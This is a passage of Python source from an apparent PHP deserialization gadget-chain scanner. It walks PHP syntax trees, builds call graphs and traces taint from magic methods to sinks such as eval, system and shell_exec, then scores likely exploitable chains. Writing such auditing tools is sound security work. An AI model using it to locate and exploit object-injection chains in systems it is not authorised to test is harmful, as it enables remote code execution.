self._process_method_call(node, line)
elif kind == 'AST_STATIC_CALL':
self._process_static_call(node, line)
elif kind == 'AST_NEW':
self._process_new(node, line)
elif kind == 'AST_PROP':
self._process_property_access(node, line)
# Check for implicit __toString triggers
if kind in ('AST_BINARY_OP', 'AST_ASSIGN_OP', 'AST_ECHO', 'AST_PRINT', 'AST_CAST'):
self._process_tostring_trigger(node, line)
except Exception:
# Continue even if processing fails
pass
# Add children to stack (limit depth)
children = node.get('children')
if isinstance(children, dict):
for child in children.values():
if isinstance(child, dict):
stack.append(child)
elif isinstance(child, list):
for item in child:
if isinstance(item, dict):
stack.append(item)
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append(child)
def _process_call(self, node: Dict, line: int):
"""Process function call"""
children = node.get('children', {})
expr = children.get('expr')
func_name = self._get_name(expr)
variable_call = False
if not func_name:
func_name = self._get_var_name(expr)
variable_call = bool(func_name)
# Handle $this->prop() or $obj->prop() style dynamic calls
if not func_name and isinstance(expr, dict) and expr.get('kind') == 'AST_PROP':
prop_children = expr.get('children', {})
prop_name = self._get_name(prop_children.get('prop'))
var_expr = prop_children.get('expr')
var_name = self._get_var_name(var_expr)
if prop_name:
prefix = "$this->" if var_name == 'this' else (f"${var_name}->" if var_name else "$?->")
func_name = f"{prefix}{prop_name}"
variable_call = True
if func_name and self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=None,
callee_method=func_name,
call_type='function',
line=line
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'function',
'name': func_name,
'line': line,
'variable_call': variable_call
})
def _process_method_call(self, node: Dict, line: int):
"""Process method call: $obj->method()"""
children = node.get('children', {})
expr = children.get('expr') # The object
method_node = children.get('method')
method_name = self._get_name(method_node)
var_name = self._get_var_name(expr)
if method_name and self.current_class and self.current_method:
# Determine target class if possible
target_class = None
if var_name == 'this':
target_class = self.current_class
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=target_class,
callee_method=method_name,
call_type='method',
line=line,
variable=var_name
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'method',
'name': method_name,
'variable': var_name,
'target_class': target_class,
'line': line
})
def _process_static_call(self, node: Dict, line: int):
"""Process static call: Class::method()"""
children = node.get('children', {})
class_node = children.get('class')
method_node = children.get('method')
class_name = self._get_name(class_node)
class_name = self._normalize_class_reference(class_name)
method_name = self._get_name(method_node)
if class_name and method_name and self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=class_name,
callee_method=method_name,
call_type='static',
line=line
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'static',
'name': method_name,
'class': class_name,
'line': line
})
def _process_new(self, node: Dict, line: int):
"""Process object instantiation"""
children = node.get('children', {})
class_node = children.get('class')
# Check if it's a dynamic instantiation: new $var()
class_name = self._get_name(class_node)
variable_new = False
if not class_name:
class_name = self._get_var_name(class_node)
variable_new = bool(class_name)
if variable_new and self.current_class and self.current_method:
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'new',
'name': class_name,
'line': line,
'variable_call': True
})
def _process_property_access(self, node: Dict, line: int):
"""Process property access: $obj->prop"""
children = node.get('children', {})
expr = children.get('expr')
prop_node = children.get('prop')
var_name = self._get_var_name(expr)
prop_name = self._get_name(prop_node)
if prop_name and self.current_class and self.current_method:
access = PropertyAccess(
class_name=self.current_class,
method_name=self.current_method,
property_name=prop_name,
access_type='read',
line=line
)
self.property_accesses.append(access)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['property_accesses'].append({
'name': prop_name,
'variable': var_name,
'line': line
})
def _process_tostring_trigger(self, node: Dict, line: int):
"""Handle implicit __toString triggers like echo, print, concat"""
kind = node.get('kind')
children = node.get('children', {})
flags = node.get('flags', 0)
candidates = []
if kind == 'AST_BINARY_OP' and flags == 8: # BINARY_CONCAT
candidates.append(children.get('left'))
candidates.append(children.get('right'))
elif kind == 'AST_ASSIGN_OP' and flags == 264: # ASSIGN_CONCAT
candidates.append(children.get('var'))
candidates.append(children.get('expr'))
elif kind == 'AST_ECHO':
if isinstance(children, dict):
candidates.append(children)
elif isinstance(children, list):
candidates.extend(children)
elif kind == 'AST_PRINT':
candidates.append(children.get('expr'))
elif kind == 'AST_CAST' and flags == 2: # TYPE_STRING
candidates.append(children.get('expr'))
for candidate in candidates:
if not isinstance(candidate, dict):
continue
var_name = self._get_var_name(candidate)
target_class = None
if var_name == 'this':
target_class = self.current_class
# Identify property access if possible for better reporting
prop_name = None
if candidate.get('kind') == 'AST_PROP':
prop_children = candidate.get('children', {})
name_node = prop_children.get('prop')
prop_name = self._get_name(name_node)
if self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=target_class,
callee_method='__toString',
call_type='method',
line=line,
variable=var_name
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
entry = {
'type': 'method',
'name': '__toString',
'variable': var_name,
'target_class': target_class,
'line': line,
'implicit': True
}
self.methods[method_key]['calls'].append(entry)
def _extract_params(self, params_node: Dict) -> List[str]:
"""Extract parameter names from AST_PARAM_LIST"""
if not params_node:
return []
params = []
children = params_node.get('children')
if isinstance(children, list):
for param in children:
if isinstance(param, dict):
name_node = param.get('children', {}).get('name')
param_name = self._get_name(name_node)
if param_name:
params.append(param_name)
return params
def _get_name(self, node: Any) -> Optional[str]:
"""Extract name from various node types - with recursion protection"""
if node is None:
return None
if isinstance(node, str):
return node
if not isinstance(node, dict):
return None
# Avoid infinite recursion
max_depth = 5
depth = 0
current = node
while depth < max_depth:
if not isinstance(current, dict):
break
kind = current.get('kind')
children = current.get('children', {})
if kind == 'AST_VAR':
return None
if kind == 'AST_NAME':
return children.get('name')
elif 'name' in children:
name_val = children.get('name')
if isinstance(name_val, str):
return name_val
elif isinstance(name_val, dict):
current = name_val
depth += 1
else:
return None
else:
return None
return None
def _get_var_name(self, node: Any) -> Optional[str]:
"""Extract variable name from VAR node - with recursion protection"""
if not isinstance(node, dict):
return None
kind = node.get('kind')
children = node.get('children', {})
if kind == 'AST_VAR':
name_node = children.get('name')
if isinstance(name_node, str):
return name_node
return self._get_name(name_node)
return None
def _extract_name_list(self, node: Any) -> List[str]:
"""Extract a list of names from AST_NAME_LIST or similar structures"""
names: List[str] = []
if node is None:
return names
if isinstance(node, list):
for child in node:
names.extend(self._extract_name_list(child))
return names
if isinstance(node, str):
names.append(node)
return names
if not isinstance(node, dict):
return names
kind = node.get('kind')
children = node.get('children', [])
if kind == 'AST_NAME_LIST' and isinstance(children, list):
for child in children:
name = self._get_name(child)
if name:
names.append(name)
else:
name = self._get_name(node)
if name:
names.append(name)
return names
def _normalize_class_reference(self, class_name: Optional[str]) -> Optional[str]:
"""Normalize class references like self/static/parent to concrete names"""
if not class_name:
return None
lowered = class_name.lower()
if lowered in {'self', 'static'}:
return self.current_class
if lowered == 'parent':
if self.current_class and self.current_class in self.classes:
return self.classes[self.current_class].get('parent')
return None
return class_name
def resolve_method_in_hierarchy(self, class_name: Optional[str], method_name: str) -> Optional[str]:
    """Look up ``method_name`` on a class, then on each ancestor in turn.

    Returns:
        The ``"Class::method"`` key of the first class in the parent
        chain that defines the method, or ``None`` if none does (or if
        either argument is empty). Inheritance cycles terminate the walk.
    """
    if not (class_name and method_name):
        return None

    seen = set()
    cursor = class_name
    while True:
        if not cursor or cursor in seen:
            return None
        seen.add(cursor)

        candidate = f"{cursor}::{method_name}"
        if candidate in self.methods:
            return candidate

        # Step to the parent; unknown classes end the walk.
        info = self.classes.get(cursor)
        cursor = info.get('parent') if info else None
def find_method_by_name(self, method_name: str) -> Optional[str]:
    """Return the first recorded method key ending in ``::method_name``.

    Keys are scanned in the iteration order of ``self.methods``; the
    owning class is not considered. Returns ``None`` for an empty name or
    when nothing matches.
    """
    if not method_name:
        return None
    suffix = f"::{method_name}"
    return next((key for key in self.methods if key.endswith(suffix)), None)
def get_class_lineage(self, class_name: Optional[str]) -> List[str]:
    """Return ``class_name`` followed by its ancestors, nearest first.

    The walk follows each class's recorded ``parent`` and stops at an
    unknown class, a missing parent, or the first repeated class (cycle
    protection). An empty ``class_name`` yields an empty list.
    """
    chain: List[str] = []
    cursor = class_name
    # ``chain`` doubles as the visited record; lineages are short.
    while cursor and cursor not in chain:
        chain.append(cursor)
        info = self.classes.get(cursor)
        cursor = info.get('parent') if info else None
    return chain
class AdvancedTaintAnalyzer:
"""Multi-level taint analyzer with object injection detection.

The class-level tables below configure which PHP functions count as
sinks, which functions are considered harmless, and which methods are
treated as entry points.
"""
# Sink categories mapped to PHP function/class names. __init__ builds a
# lower-cased copy (sinks_normalized) that sink detection matches against.
# NOTE: every name under 'command' is also listed under 'rce'.
SINKS = {
'rce': {'eval', 'system', 'exec', 'passthru', 'shell_exec', 'popen',
'proc_open', 'pcntl_exec', 'create_function', '`'},
'file_ops': {'file_put_contents', 'fopen', 'file_get_contents', 'fwrite',
'unlink', 'rmdir', 'rename', 'copy', 'move_uploaded_file', 'fread'},
'code_inclusion': {'include', 'require', 'include_once', 'require_once'},
'reflection': {'call_user_func', 'call_user_func_array', 'call_user_method',
'forward_static_call', 'ReflectionFunction', 'ReflectionMethod'},
'sql': {'mysql_query', 'mysqli_query', 'pg_query', 'sqlite_query', 'query'},
'command': {'shell_exec', 'proc_open', 'popen', 'passthru'}
}
# Method names regarded as PHP magic methods.
# NOTE(review): 'offsetGet' is an ArrayAccess method rather than a magic
# method; presumably listed on purpose because it is also an entry point.
MAGIC_METHODS = {
'__destruct', '__call', '__callStatic', '__get',
'__set', '__isset', '__unset', '__sleep', '__wakeup', '__toString',
'__invoke', '__set_state', '__clone', '__debugInfo', '__serialize',
'__unserialize', 'offsetGet'
}
# Functions never reported by sink detection. A plain (non-variable)
# function call that is neither a known sink nor listed here is reported
# as a low-severity "Suspicious Function". Only the File/Path group is
# active; the other groups are commented out, so those functions are
# currently reported as suspicious.
SAFE_PHP_FUNCTIONS = {
# Strings
# 'strlen', 'strpos', 'strrpos', 'substr', 'str_replace', 'str_repeat',
# 'strtoupper', 'strtolower', 'trim', 'rtrim', 'ltrim', 'implode', 'explode',
# 'sprintf', 'vsprintf', 'addslashes', 'stripslashes', 'htmlspecialchars',
# 'htmlentities', 'urlencode', 'urldecode', 'base64_encode', 'base64_decode',
# 'json_encode', 'json_decode', 'serialize', 'unserialize', 'nl2br', 'chop',
# 'chr', 'ord', 'str_split', 'str_word_count', 'strcmp', 'strcasecmp',
# 'ucfirst', 'ucwords', 'md5', 'sha1', 'hash', 'crc32', 'lcfirst', 'number_format',
# 'str_pad', 'str_shuffle', 'strrev', 'strstr', 'strtok', 'wordwrap',
# Arrays
# 'count', 'sizeof', 'array_key_exists', 'array_keys', 'array_values',
# 'array_map', 'array_filter', 'array_merge', 'array_pop', 'array_push',
# 'array_shift', 'array_unshift', 'array_slice', 'array_splice', 'in_array',
# 'compact', 'extract', 'range', 'sort', 'rsort', 'asort', 'arsort',
# 'ksort', 'krsort', 'usort', 'uasort', 'uksort', 'shuffle', 'array_flip',
# 'array_reverse', 'array_search', 'array_sum', 'array_unique', 'array_combine',
# 'array_chunk', 'array_column', 'array_count_values', 'array_diff',
# 'array_diff_assoc', 'array_diff_key', 'array_fill', 'array_fill_keys',
# 'array_intersect', 'array_intersect_assoc', 'array_intersect_key',
# 'array_multisort', 'array_pad', 'array_product', 'array_rand',
# 'array_replace', 'array_replace_recursive', 'array_walk', 'array_walk_recursive',
# 'current', 'each', 'end', 'key', 'list', 'next', 'pos', 'prev', 'reset',
# Types/Validation
# 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int',
# 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real',
# 'is_resource', 'is_scalar', 'is_string', 'isset', 'empty', 'defined',
# 'intval', 'floatval', 'strval', 'boolval', 'gettype', 'settype',
# 'is_countable', 'is_iterable',
# Objects/Classes
# 'function_exists', 'class_exists', 'method_exists', 'property_exists',
# 'is_a', 'is_subclass_of', 'get_class', 'get_called_class', 'get_parent_class',
# 'get_object_vars', 'get_class_methods', 'get_class_vars', 'trait_exists',
# 'interface_exists',
# Date/Time
# 'date', 'time', 'strtotime', 'microtime', 'mktime', 'gmdate', 'idate',
# 'checkdate', 'date_create', 'date_format', 'date_diff', 'date_add',
# 'date_sub', 'date_interval_create_from_date_string', 'getdate',
# File/Path (Non-destructive/Non-reading content)
'dirname', 'basename', 'pathinfo', 'file_exists', 'is_dir', 'is_file',
'is_readable', 'is_writable', 'is_executable', 'is_link', 'stat',
'filesize', 'filemtime', 'filectime', 'fileatime', 'glob', 'disk_free_space',
'disk_total_space', 'getcwd', 'realpath',
# Math
# 'abs', 'ceil', 'floor', 'round', 'max', 'min', 'rand', 'mt_rand',
# 'sqrt', 'pow', 'exp', 'log', 'sin', 'cos', 'tan', 'pi', 'bindec',
# 'decbin', 'dechex', 'hexdec', 'octdec', 'decoct', 'fmod', 'hypot',
# 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
# Output/Control
# 'header', 'setcookie', 'die', 'exit', 'define', 'constant',
# 'error_log', 'trigger_error', 'debug_backtrace', 'print_r', 'var_dump',
# 'var_export', 'printf', 'vprintf', 'sleep', 'usleep',
# Regex
# 'preg_match', 'preg_match_all', 'preg_replace', 'preg_split', 'preg_quote',
# 'preg_grep', 'preg_replace_callback',
# Misc
# 'version_compare', 'extension_loaded', 'phpversion', 'ini_get', 'getenv',
# 'putenv', 'set_time_limit', 'ignore_user_abort', 'uniqid',
# 'get_defined_constants', 'get_defined_functions', 'get_defined_vars',
# 'get_included_files', 'get_required_files', 'memory_get_usage',
# 'memory_get_peak_usage', 'register_shutdown_function'
}
# Methods treated as chain entry points: they receive the higher taint
# confidence (0.95) and mark a class as injectable.
ENTRY_POINTS = {'__wakeup', '__destruct', '__toString', '__unserialize', 'offsetGet'}
def __init__(self, walker: ASTWalker):
self.walker = walker
self.taint_sources: List[TaintSource] = []
self.taint_sinks: List[TaintSink] = []
self.tainted_properties: Dict[str, Set[str]] = defaultdict(set)
self.tainted_methods: Dict[str, float] = {}
self.call_graph: Dict[str, List[CallSite]] = defaultdict(list)
self.sinks_normalized = {
category: {func.lower() for func in functions}
for category, functions in self.SINKS.items()
}
# Add patterns for dynamic calls with multiple arguments (potential RCE via call_user_func etc)
# but also simple variable function calls like $k($v)
def analyze(self, stream_output: bool = True) -> List[GadgetChain]:
    """Run the six analysis stages in order and return the detected chains.

    Args:
        stream_output: When true, print the opening and closing banners
            and stream each chain as it is found. The per-stage progress
            lines are printed regardless of this flag.

    Returns:
        The chains produced by ``_detect_gadget_chains_streaming``.
    """
    heavy_rule = "=" * 100
    light_rule = "-" * 100

    if stream_output:
        print("\n" + heavy_rule)
        print(" 🔍 LIVE GADGET CHAIN DETECTION")
        print(heavy_rule + "\n")

    print(" [1/6] Identifying taint sources...")
    self._identify_taint_sources()
    print(f" ✓ Found {len(self.taint_sources)} taint sources")

    print(" [2/6] Identifying dangerous sinks...")
    self._identify_sinks()
    print(f" ✓ Found {len(self.taint_sinks)} dangerous sinks")

    print(" [3/6] Building call graph...")
    self._build_call_graph()
    print(f" ✓ Built call graph with {len(self.call_graph)} nodes")

    print(" [4/6] Propagating taint (multi-level)...")
    self._propagate_taint_multi_level()

    print(" [5/6] Analyzing object injection points...")
    injectable = self._analyze_injectable_objects()
    print(f" ✓ Found {len(injectable)} injectable classes")

    print(" [6/6] Detecting exploitable gadget chains...")
    if stream_output:
        print("\n" + light_rule)
        print(" 🎯 DETECTED CHAINS (streaming results)")
        print(light_rule + "\n")

    chains = self._detect_gadget_chains_streaming(injectable, stream_output)

    if stream_output:
        print("\n" + heavy_rule)
        print(f" ✅ ANALYSIS COMPLETE: {len(chains)} total chains detected")
        print(heavy_rule + "\n")
    return chains
def _identify_taint_sources(self):
"""Identify taint sources from magic methods and properties"""
for method_key, method_data in self.walker.methods.items():
method_name = method_data['name']
if not method_data['is_magic'] and method_name not in self.ENTRY_POINTS:
continue
class_name = method_data['class']
confidence = 0.95 if method_name in self.ENTRY_POINTS else 0.7
# Properties accessed in magic methods are tainted
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
self.tainted_properties[class_name].add(prop_name)
source = TaintSource(
name=f"Property in {method_name}",
class_name=class_name,
method_name=method_name,
variable=f"$this->{prop_name}",
location=method_key,
source_type='property',
confidence=confidence
)
self.taint_sources.append(source)
# Mark magic method itself as tainted
self.tainted_methods[method_key] = confidence
def _identify_sinks(self):
"""Identify all dangerous sinks"""
for method_key, method_data in self.walker.methods.items():
for call_info in method_data.get('calls', []):
if call_info.get('type') != 'function':
continue
func_name = (call_info.get('name') or '').strip()
if not func_name:
continue
func_name_lower = func_name.lower()
# Check if it's a dangerous function
for category, functions in self.sinks_normalized.items():
if func_name_lower in functions:
severity = self._get_severity(category)
sink = TaintSink(
name=f"{category} sink",
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=func_name,
severity=severity,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
# Check for unknown/suspicious functions
if call_info.get('type') == 'function' and not call_info.get('variable_call'):
if func_name_lower not in self.SAFE_PHP_FUNCTIONS:
# If it's not a known sink and not a safe function, treat as suspicious
# We skip if it's a known sink (already handled above)
is_known_sink = False
for functions in self.sinks_normalized.values():
if func_name_lower in functions:
is_known_sink = True
break
if not is_known_sink:
sink = TaintSink(
name="Suspicious Function",
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=func_name,
severity=TaintLevel.LOW,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
# Check for variable function calls or dynamic instantiation
if (call_info.get('type') == 'function' or call_info.get('type') == 'new') and call_info.get('variable_call'):
func_name_sink = call_info.get('name')
is_new = call_info.get('type') == 'new'
display_name = f"new ${func_name_sink}(...)" if is_new else f"${func_name_sink}(...)"
sink_name = "Dynamic Instantiation" if is_new else "Dynamic Variable Call"
sink = TaintSink(
name=sink_name,
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=display_name,
severity=TaintLevel.CRITICAL,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
def _get_severity(self, category: str) -> TaintLevel:
    """Translate a sink category name into its severity level.

    Execution-style categories are CRITICAL, file, reflection and SQL
    categories are HIGH, and anything unrecognised is MEDIUM.
    """
    critical_categories = ('rce', 'code_inclusion', 'deserialization', 'command')
    high_categories = ('file_ops', 'reflection', 'sql')

    if category in critical_categories:
        return TaintLevel.CRITICAL
    if category in high_categories:
        return TaintLevel.HIGH
    return TaintLevel.MEDIUM
def _build_call_graph(self):
"""Build comprehensive call graph"""
for call_site in self.walker.calls:
caller_key = f"{call_site.caller_class}::{call_site.caller_method}"
self.call_graph[caller_key].append(call_site)
def _propagate_taint_multi_level(self):
"""Multi-level taint propagation"""
max_iterations = 10
iteration = 0
while iteration < max_iterations:
changed = False
iteration += 1
for method_key, method_data in self.walker.methods.items():
class_name = method_data['class']
# If method accesses tainted properties, mark it as tainted
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
if prop_name in self.tainted_properties[class_name]:
if method_key not in self.tainted_methods:
self.tainted_methods[method_key] = 0.8
changed = True
# Propagate taint through calls
if method_key in self.tainted_methods:
for call_site in self.call_graph.get(method_key, []):
# Find the called method
callee_key = None
if call_site.callee_class:
callee_key = self.walker.resolve_method_in_hierarchy(
call_site.callee_class,
call_site.callee_method
)
else:
# Try to resolve the method
callee_key = self._resolve_method(
call_site.callee_method,
call_site.variable,
class_name
)
if callee_key and callee_key in self.walker.methods:
if callee_key not in self.tainted_methods:
# Propagate with reduced confidence
confidence = self.tainted_methods[method_key] * 0.9
self.tainted_methods[callee_key] = confidence
changed = True
else:
# Try fallback to __call or implicit __invoke
fallback_key = None
# 1. __call fallback (if method call and not found)
if call_site.call_type == 'method' and call_site.callee_class:
fallback_key = self.walker.resolve_method_in_hierarchy(
call_site.callee_class, '__call'
)
# 2. __invoke fallback (if variable call)
# Only if variable_call is marked in method data (not just call_site, which doesn't have it directly unless we look it up)
# We can check call_site type or if resolve failed for variable call
if not fallback_key and call_site.call_type == 'function':
# It's a function call, maybe variable function?
# We need to check if it was a variable call. CallSite has 'variable' field? No, 'callee_method' has name.
# Wait, _process_call sets 'variable_call' in calls dict, but CallSite object only has names.
# However, if callee_method is a variable name (starts with $? no it holds the name).
# Actually _process_call sets callee_method=var_name if implicit.
# If we assume any unresolved variable function call could be __invoke:
# We check if we can find ANY class with __invoke that is relevant?
# Without type inference, we might just check if any class has __invoke.
# That is too broad.
# But if we have object injection context, maybe we assume valid object?
# For now, let's skip __invoke global search to avoid massive FPs, unless we track variable types.
pass
if fallback_key and fallback_key in self.walker.methods:
if fallback_key not in self.tainted_methods:
confidence = self.tainted_methods[method_key] * 0.85
self.tainted_methods[fallback_key] = confidence
changed = True
if not changed:
break
print(f" ✓ Taint propagated through {iteration} iterations")
print(f" ✓ Found {len(self.tainted_methods)} tainted methods")
def _resolve_method(self, method_name: str, variable: Optional[str], current_class: str) -> Optional[str]:
"""Resolve method call to actual method key"""
if not method_name:
return None
if variable == 'this':
method_key = self.walker.resolve_method_in_hierarchy(current_class, method_name)
if method_key:
return method_key
return self.walker.find_method_by_name(method_name)
def _class_has_entry_point(self, class_name: str) -> bool:
"""Determine if a class (or its ancestors) exposes an entry point"""
for entry in self.ENTRY_POINTS:
if self.walker.resolve_method_in_hierarchy(class_name, entry):
return True
return False
def _collect_injectable_properties(self, class_name: str) -> List[str]:
"""Collect unique property names accessed across class hierarchy"""
props: List[str] = []
seen: Set[str] = set()
for lineage_class in self.walker.get_class_lineage(class_name):
class_data = self.walker.classes.get(lineage_class)
if not class_data:
continue
for method_data in class_data['methods'].values():
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
if prop_name and prop_name not in seen:
seen.add(prop_name)
props.append(prop_name)
return props
def _analyze_injectable_objects(self) -> Dict[str, List[str]]:
"""Analyze which objects can be injected to trigger chains"""
injectable = {}
for class_name in self.walker.classes.keys():
if not self._class_has_entry_point(class_name):
continue
props = self._collect_injectable_properties(class_name)
injectable[class_name] = props
return injectable
def _detect_gadget_chains_streaming(self, injectable: Dict[str, List[str]],
stream_output: bool = True) -> List[GadgetChain]:
"""Detect exploitable gadget chains and stream results as found"""
chains = []
chain_id = 1
# Group sources by entry point for better progress tracking
sources_by_entry = defaultdict(list)
for source in self.taint_sources:
if source.source_type == 'property':
sources_by_entry[source.location].append(source)
total_entries = len(sources_by_entry)
processed = 0
# Find all paths from tainted methods to sinks
for entry_method, sources in sources_by_entry.items():
processed += 1
if stream_output and processed % 5 == 0:
print(f" ... scanning entry point {processed}/{total_entries}")
# Find paths to sinks
paths = self._find_paths_bfs(entry_method, max_depth=6)
for path_data in paths:
path, sink = path_data['path'], path_data['sink']
# Determine injectable objects for this chain
chain_injectable = []
for step in path:
method = step.get('method', '')
class_name = method.split('::')[0] if '::' in method else ''
if class_name in injectable:
chain_injectable.append({
'class': class_name,
'properties': injectable[class_name]
})
# Calculate confidence
confidence = self._calculate_confidence(path, sink, chain_injectable)
# Filter low confidence chains early
if confidence < 0.4:
continue
# Generate exploitation notes
exploit_notes = self._generate_exploit_notes(path, sink, chain_injectable)
chain = GadgetChain(
chain_id=chain_id,
entry_points=[entry_method],
chain_path=path,
sink=sink,
severity=sink.severity,
confidence=confidence,
description=self._generate_description(path, sink),
injectable_objects=chain_injectable,
exploitation_notes=exploit_notes
)
chains.append(chain)
# Stream output for this chain
if stream_output:
self._print_chain_summary(chain)
chain_id += 1
return chains
def _print_chain_summary(self, chain: GadgetChain):
    """Print a compact summary of one chain as soon as it is detected.

    Shows the severity marker, id and confidence, the first four path
    steps (followed by "..." when there are more), the sink location and
    up to two injectable class names, then a blank line.
    """
    markers = {
        TaintLevel.CRITICAL: "🔴",
        TaintLevel.HIGH: "🟠",
        TaintLevel.MEDIUM: "🟡",
        TaintLevel.LOW: "🟢"
    }
    marker = markers.get(chain.severity, "⚪")
    print(f"{marker} CHAIN #{chain.chain_id} [{chain.severity.name}] Confidence: {chain.confidence:.0%}")

    def describe(step):
        # "<method> (<file>[:<line>])" for a single path step.
        name = step.get('method', '?')
        defined_in = step.get('method_file') or 'Unknown file'
        defined_at = step.get('method_line', 0)
        where = f"{defined_in}:{defined_at}" if defined_at else defined_in
        return f"{name} ({where})"

    preview = [describe(step) for step in chain.chain_path[:4]]
    if len(chain.chain_path) > 4:
        preview.append("...")
    path_str = " → ".join(preview)
    print(f" Path: {path_str}")

    sink_path = chain.sink.filepath or 'Unknown file'
    print(f" Sink: {chain.sink.function}() at {sink_path}:{chain.sink.line}")

    if chain.injectable_objects:
        shown = ', '.join(obj['class'] for obj in chain.injectable_objects[:2])
        print(f" Injectable: {shown}")
    print()
def _find_paths_bfs(self, start_method: str, max_depth: int = 6) -> List[Dict]:
"""Find paths from start to sinks using BFS - optimized version

Explores self.call_graph breadth-first from start_method and collects
{'path': [...], 'sink': TaintSink} entries for every visited method
that contains a recorded sink and whose path passes _verify_taint_flow.

Args:
start_method: "Class::method" key where the search begins.
max_depth: Queue entries deeper than this are discarded.

Returns:
The collected path/sink dictionaries; the search stops once
max_paths_per_entry (10) results have been gathered.
"""
paths = []
start_step = self._create_path_step(start_method, step_type='entry')
# Queue items are (current method key, path steps so far, depth).
queue = deque([(start_method, [start_step], 0)])
visited = set()
# Early termination if we find enough paths
max_paths_per_entry = 10
while queue and len(paths) < max_paths_per_entry:
current, path, depth = queue.popleft()
if depth > max_depth:
continue
# The state key includes the whole path, so the same method can be
# revisited when it is reached through a different route.
state_key = (current, tuple(p['method'] for p in path))
if state_key in visited:
continue
visited.add(state_key)
# Check if current method contains sinks
for sink in self.taint_sinks:
sink_method = f"{sink.class_name}::{sink.method_name}"
if sink_method == current:
# Verify taint reaches sink
if self._verify_taint_flow(path):
paths.append({'path': path.copy(), 'sink': sink})
# Continue searching for more paths
# Don't expand too much if we already have paths from this entry
if len(paths) >= max_paths_per_entry:
break
# Follow calls
for call_site in self.call_graph.get(current, []):
# Calls with a known callee class resolve through the class hierarchy;
# all other calls go through the name-based _resolve_method lookup.
if call_site.callee_class:
next_method = self.walker.resolve_method_in_hierarchy(
call_site.callee_class,
call_site.callee_method
)
else:
next_method = self._resolve_method(
call_site.callee_method,
call_site.variable,
call_site.caller_class
)
if next_method and next_method in self.walker.methods:
# Avoid revisiting in this path
if any(step['method'] == next_method for step in path):
continue
new_step = self._create_path_step(
next_method,
step_type='call',
call_type=call_site.call_type,
caller_method=current,
call_line=call_site.line
)
new_path = path + [new_step]
queue.append((next_method, new_path, depth + 1))
return paths
def _create_path_step(
self,
method_name: str,
step_type: str,
call_type: Optional[str] = None,
caller_method: Optional[str] = None,
call_line: Optional[int] = None
) -> Dict[str, Any]:
"""Build a standardized path step with metadata"""
method_info = self.walker.methods.get(method_name, {})
class_name = method_name.split('::')[0] if '::' in method_name else ''
method_file = method_info.get('filepath', '')
method_line = method_info.get('line', 0)
caller_info = self.walker.methods.get(caller_method, {}) if caller_method else {}
return {
'method': method_name,
'class': class_name,
'type': step_type,
'call_type': call_type or ('entry' if step_type == 'entry' else ''),
'method_file': method_file,
'method_line': method_line,
'line': call_line if call_line is not None else method_line,
'call_line': call_line if call_line is not None else 0,
'call_file': caller_info.get('filepath', ''),
}
def _verify_taint_flow(self, path: List[Dict]) -> bool:
"""Verify that taint flows through the path"""
for step in path:
method = step.get('method', '')
if method in self.tainted_methods:
return True
return False
def _calculate_confidence(self, path: List[Dict], sink: TaintSink,
                          injectable: List[Dict]) -> float:
    """Score how plausible a chain is, as a value capped at 0.99.

    The score is the product of a 0.6 base and five factors: path length
    (shorter is better, floor 0.3), entry-point bonus (1.3 when the first
    method name contains an entry-point name), sink severity, presence
    of injectable classes (1.2 versus 0.8), and a taint factor.

    NOTE(review): the taint factor starts at 1.0 and only ever takes the
    maximum with recorded method confidences, so it stays 1.0 unless a
    recorded confidence exceeds 1.0.

    Returns:
        The score rounded to two decimals.
    """
    entry_name = path[0].get('method', '')
    starts_at_entry_point = any(marker in entry_name for marker in self.ENTRY_POINTS)

    severity_weights = {
        TaintLevel.CRITICAL: 1.0,
        TaintLevel.HIGH: 0.85,
        TaintLevel.MEDIUM: 0.7,
        TaintLevel.LOW: 0.5
    }

    recorded = [
        self.tainted_methods[step.get('method', '')]
        for step in path
        if step.get('method', '') in self.tainted_methods
    ]
    taint_factor = max([1.0] + recorded)

    # Multiply in a fixed order so rounding behaviour stays stable.
    score = 0.6
    score *= max(0.3, 1.0 - (len(path) - 1) * 0.12)   # length
    score *= 1.3 if starts_at_entry_point else 1.0     # entry point
    score *= severity_weights.get(sink.severity, 0.5)  # severity
    score *= 1.2 if injectable else 0.8                # injectability
    score *= taint_factor                              # taint
    return round(min(0.99, score), 2)
def _generate_description(self, path: List[Dict], sink: TaintSink) -> str:
"""Generate chain description"""
entry = path[0].get('method', 'Unknown')
def format_step(step: Dict[str, Any]) -> str:
method = step.get('method', '?')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
if method_line:
return f"{method} ({method_file}:{method_line})"
return f"{method} ({method_file})"
chain_str = " → ".join([format_step(p) for p in path])
